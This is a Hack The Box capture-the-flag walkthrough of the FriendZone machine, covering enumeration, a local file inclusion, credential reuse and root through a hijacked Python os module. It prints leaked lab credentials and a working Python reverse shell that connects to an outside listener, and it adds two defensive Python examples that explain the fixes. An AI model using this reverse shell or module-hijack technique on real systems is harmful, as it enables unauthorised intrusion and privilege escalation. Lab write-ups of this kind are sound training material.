FriendZone — HTB
FriendZone was a fun box with a lot of rabbit holes that you learn a lot from. Really interesting.
First we start with our nmap scan:
nmap -sC -sV -A -p- 10.129.198.247
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu
Okay, so a lot of ports and a lot of things to enumerate, but we take one thing at a time. We start off with FTP. Anonymous authentication is not allowed, and some default creds did not work.

Port 53 is up next; we will use dig to go through the server's DNS.
Now, this is where it gets interesting: from port 443 I can see that the IP has a CN of friendzone.red, so I will add that to my /etc/hosts. Also, when I browsed to the port while gobuster was running in the background, I saw the following:

Okay, cool, so we have both friendzone.red and friendzoneportal.red.
I will now add both to /etc/hosts and then run dig.

That's a lot of DNS records:
friendzone.red
administrator1.friendzone.red
hr.friendzone.red
uploads.friendzone.red
friendzoneportal.red
admin.friendzoneportal.red
files.friendzoneportal.red
imports.friendzoneportal.red
vpn.friendzoneportal.red
Okay, so I will add all of these to /etc/hosts.
A lot of these look super interesting.
http://friendzone.red = nothing
https://friendzone.red
This one gave us something interesting:

Hmm, let's check that out.

OK, that's base64.
Decodes to:
dspONlSm3M163683263107RgfV1INj
Nothing more to find there.

This one actually gives me a login page.
Tried default creds, but they're not working.

Kept enumerating:
https://uploads.friendzone.red/

Uploaded both a PHP and a JPG file, with these results:

https://admin.friendzoneportal.red/

Gives a fake login page; creds don't work when I try them.

https://files.friendzoneportal.red
Nothing.

https://imports.friendzoneportal.red/
https://vpn.friendzoneportal.red/
Both gave 404 Not Found.
Okay, so nothing more there yet.
However, the server had SMB as well.

OK, we can access general and development.

Creds:
admin:WORKWORKHhallelujah@#
Let's look at development.

Okay, nothing... It may come in handy later, though, because we have read/write access.
Okay, I will test the admin credentials now.


Okay, so I will upload my dog picture again to see if I can make sense of this.

But no success in finding the image in uploads or anywhere else.
However, dashboard.php looks very suspicious in the URI when it takes the parameter.
So after visiting dashboard.php and adding the parameters image_id=a.jpg&pagename=timestamp, as the page tells us to, the URI we get is:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
I had huge problems with this. However, after some enumeration with gobuster I saw "timestamp.php":


OK, but when we enter it in the URL we get:

And when we add .php after timestamp we get nothing.
This means that it ADDS the .php extension itself, and there must be an LFI here.
As we remember from the SMB enumeration, we couldn't access the Files Samba share.
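What that "parameter + .php" include looks like in code, and how to close it, as an added example (written in Python rather than the box's PHP, and not the real dashboard.php source): the first function mirrors the behaviour inferred above, the second resolves a page name only from an allowlist and then confirms the normalised path still sits under the web root. The web root and the allowlist are constructed values, not taken from the box.

```python
import os

# Constructed allowlist of the pages the application is expected to serve.
ALLOWED_PAGES = {"timestamp", "dashboard", "login"}


def resolve_vulnerable(webroot, pagename):
    """Mirror of what the writeup infers dashboard.php does: the user-supplied
    pagename is concatenated with '.php' and handed straight to include(),
    so a value containing '../' walks out of the web root."""
    return os.path.join(webroot, pagename + ".php")


def resolve_hardened(webroot, pagename):
    """Allowlist the page name, then confirm the normalised result is still
    inside webroot. Both checks matter: the allowlist stops traversal and
    unexpected files, the containment check guards against a future mistake
    in the allowlist itself. A real deployment would also run the result
    through os.path.realpath so symlinks cannot lead outside the root."""
    if pagename not in ALLOWED_PAGES:
        raise ValueError("unknown page: %r" % pagename)
    root = os.path.normpath(webroot)
    candidate = os.path.normpath(os.path.join(root, pagename + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("path escapes web root: %r" % candidate)
    return candidate


def demo():
    """Run both resolvers over constructed inputs: the page the application
    expects, and a traversal value shaped like the one used in this writeup.
    Returns a dict keyed by input so the two outcomes can be compared."""
    webroot = "/var/www"  # assumed location, not taken from the box
    results = {}
    for page in ("timestamp", "../../etc/Development/shell3"):
        entry = {"vulnerable": os.path.normpath(resolve_vulnerable(webroot, page))}
        try:
            entry["hardened"] = resolve_hardened(webroot, page)
        except ValueError as exc:
            entry["hardened"] = "rejected: %s" % exc
        results[page] = entry
    return results


if __name__ == "__main__":
    for page, outcome in demo().items():
        print("%-32s vulnerable -> %s" % (page, outcome["vulnerable"]))
        print("%-32s hardened   -> %s" % ("", outcome["hardened"]))
```

Running the file shows the vulnerable resolver turning the traversal value into /etc/Development/shell3.php while the hardened one rejects it at the allowlist; a bare "timestamp" resolves identically in both.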

However, this one was in /etc/Files.
That means general and development are most likely in /etc/development and /etc/general.
I will upload my shell to Development.

Now, this must mean that shell3.php is in /etc/Development.
So if we want to trigger this file through the LFI we must use shell3 and NOT shell3.php, since the .php extension is added.
We visit the following:
Then start our listener.

After some manual enumeration we find an interesting file:


OK, cool, this is apparently a password used for the MySQL DB. Let's try this password, because password reuse is pretty common.

It worked! Now we just need to escalate to root.
After some more enumeration I found a file in the /opt/server-admin folder named reporter.py:

From the script we can see that it's running Python 2, because in Python 3 print is a function call with parentheses, like print("test"), whereas Python 2 uses print "test".
Okay, so this script is not really running any commands, but it does import Python's os module. If we could tamper with that module and put our own Python code into it, we could get a reverse shell.
First, let's investigate and find where the os module file lives.
Now we have the path of the file that the script imports as os. Let's look at the file now:

Okay, this is really good news: we have full permissions on the file, which means we can put whatever code we want inside it and hijack the library.
So let's create a reverse shell and append it to the file:
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.68", 445))  # our listener from the step above
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
import pty
pty.spawn("/bin/bash")
Now we wait 2 minutes, and bam, we're root!
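The root cause of that escalation is a module on the interpreter's search path that an unprivileged user can write to, later imported by a process running as root. The following check is an added example (mine, not part of the writeup or the box): it walks a list of directories the way the import system does, reports modules or directories writable by group or others (or owned by someone other than the user the importing process trusts), and shows which copy of a module name an import would pick up first. demo() builds a constructed temporary directory holding one correctly permissioned module and one world-writable os.py; running the file directly audits the current interpreter's sys.path.

```python
import os
import shutil
import stat
import sys
import tempfile

# Mode bits that let group members or everyone else modify a file or
# directory; a module with either bit set can be replaced by such a user.
GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH


def loosely_writable(path):
    """True if the path's own mode lets group or others write to it."""
    return bool(os.lstat(path).st_mode & GROUP_OR_WORLD_WRITE)


def audit_search_path(dirs, expected_uid=0):
    """Return (path, reason) findings for every directory in dirs.

    A directory is reported if it is group/world-writable (anyone could
    drop a new module there); a .py file is reported if it is
    group/world-writable or owned by someone other than expected_uid,
    the user the importing process trusts (root by default).
    """
    findings = []
    for directory in dirs:
        if not os.path.isdir(directory):
            continue  # sys.path routinely holds zip files and missing dirs
        if loosely_writable(directory):
            findings.append((directory, "directory writable by group/others"))
        for name in sorted(os.listdir(directory)):
            if not name.endswith(".py"):
                continue
            path = os.path.join(directory, name)
            st = os.lstat(path)
            if st.st_mode & GROUP_OR_WORLD_WRITE:
                findings.append((path, "module writable by group/others"))
            elif st.st_uid != expected_uid:
                findings.append((path, "module not owned by uid %d" % expected_uid))
    return findings


def first_match(dirs, module_name):
    """Which file an `import module_name` would load: the import system
    searches dirs in order and stops at the first hit, so a writable copy
    early in the path shadows the legitimate one."""
    for directory in dirs:
        candidate = os.path.join(directory, module_name + ".py")
        if os.path.isfile(candidate):
            return candidate
    return None


def demo():
    """Constructed scenario: a search-path directory holding a properly
    permissioned module and a world-writable os.py. Returns the findings
    as (basename, reason) pairs and the basename the import would pick."""
    directory = tempfile.mkdtemp(prefix="pathaudit-")
    os.chmod(directory, 0o755)
    for name, mode in (("helper.py", 0o644), ("os.py", 0o777)):
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write("# constructed module for the audit demo\n")
        os.chmod(path, mode)
    findings = [(os.path.basename(p), reason)
                for p, reason in audit_search_path([directory], os.getuid())]
    picked = os.path.basename(first_match([directory], "os"))
    shutil.rmtree(directory)
    return findings, picked


if __name__ == "__main__":
    # Audit the live interpreter: with the default expected_uid=0 this flags
    # any user-owned module a root-run script could be tricked into loading.
    for path, reason in audit_search_path(sys.path):
        print("%s: %s" % (path, reason))
    print(demo())
```

On the box in this writeup the same audit run against the Python 2 search path would have reported the os module file as group/world-writable, which is exactly the condition the appended reverse shell relies on; fixing it is a matter of restoring owner-only write (mode 644, owned by root) on the file and its directory.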